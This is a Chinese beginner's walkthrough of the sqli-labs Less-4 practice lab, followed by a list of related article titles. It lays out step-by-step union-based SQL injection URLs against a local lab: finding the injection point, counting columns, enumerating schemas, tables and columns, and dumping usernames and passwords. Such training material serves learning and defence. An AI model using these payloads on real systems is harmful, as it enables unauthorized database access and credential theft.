sqli-labs-less-4圖文詳解,適合小白
Less-4
less1-3以釋出,1-4題相關知識點在https://blog.csdn.net/qq_46432288/article/details/109226871中,點選檢視吧!!!
less-4與1-3方法基本一致,只是最開始的判斷注入點有一點差別。
判斷注入:
http://127.0.0.1/sqli-labs-master/Less-4/?id=1 顯示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 顯示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1’’ 顯示正常(兩個單引號)
http://127.0.0.1/sqli-labs-master/Less-4/?id=2" 顯示錯誤(一個雙引號),錯誤:’“2"”) LIMIT 0,1’,出現一個)
http://127.0.0.1/sqli-labs-master/Less-4/?id=2")–+ 顯示正常,判斷原資料輸入後應該為(“id”)
判斷欄位列數:
http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 10 --+
顯示Unknown column ‘10’ in ‘order clause’,說明欄位列數少於10,繼續縮小數值進行測試。
http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 3 --+ 正常顯示,表明欄位列數為3
判斷可回顯位:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,3 --+
判斷當前資料庫:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,database() --+
判斷當前使用者:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,user() --+
檢視所有資料庫:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(schema_name) from information_schema.schemata --+
檢視當前資料庫中的所有表:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
檢視users表中的欄位:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
輸出username:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(username) from security.users --+
輸出password:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(password) from security.users --+
將username和password連線並聯合輸出:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users --+
Less-4結束
。。。未完待續
相關文章
- python適合小白學嗎?Python
- Java泛型詳解,史上最全圖文詳解!Java泛型
- PopClip使用教程圖文詳解
- PyCharm的使用教程【圖文結合-詳細】PyCharm
- Typora+圖床詳解(小白都能學得會)圖床
- 分頁機制圖文詳解
- DEVONthink詳解|哪些檔案最適合放進 DEVONthink?dev
- CentOS 7安裝教程(圖文詳解)CentOS
- 圖文詳解23種設計模式設計模式
- 圖文並茂詳解 NAT 協議!協議
- Jenkins安裝部署使用圖文詳解(非常詳細)Jenkins
- [適合小白的Linu基礎入門教程一
- 小朋友適合讀增廣賢文麼,增廣賢文適合多大的孩子看?
- EventBus 3.0+ 原始碼詳解(史上最詳細圖文講解)原始碼
- Wgpu圖文詳解(03)緩衝區BufferGPU
- 常用負載均衡詳解(圖文總結)負載
- ZooKeeper最全詳解(萬字圖文總結)
- 微服務最全詳解(圖文全面總結)微服務
- LL圖文詳解mysql中with...as用法huxMySqlUX
- cookie與session的區別(圖文詳解)CookieSession
- 事務隔離級別(圖文詳解)
- 【分享】5個非常適合Python小白的開發工具!Python
- 非常適合小白入門的Python學習路線Python
- 自媒體選圖文還是視訊?哪個更適合新人?
- socket基礎詳解 小白白
- mysql資料庫的安裝(圖文詳解)MySql資料庫
- 負載均衡最全詳解(圖文全面總結)負載
- 圖文詳解 HDFS 的工作機制及其原理
- Java單連結串列反轉圖文詳解Java
- 圖文詳解Java物件記憶體佈局Java物件記憶體
- 小白轉行,python、Java、c++選擇哪個合適?PythonJavaC++
- 小白適合學Python嗎 怎麼加入Python開發行列Python
- 適合新手小白的UI學習路線完整版UI
- 520 頁機器學習筆記!圖文並茂可能更適合你機器學習筆記
- 【小白學AI】GBDT梯度提升詳解AI梯度
- Wgpu圖文詳解(02)渲染管線與著色器GPU
- 分散式儲存最全詳解(圖文全面總結)分散式
- iOS AppStore上架流程圖文詳解2021版 (上)iOSAPP流程圖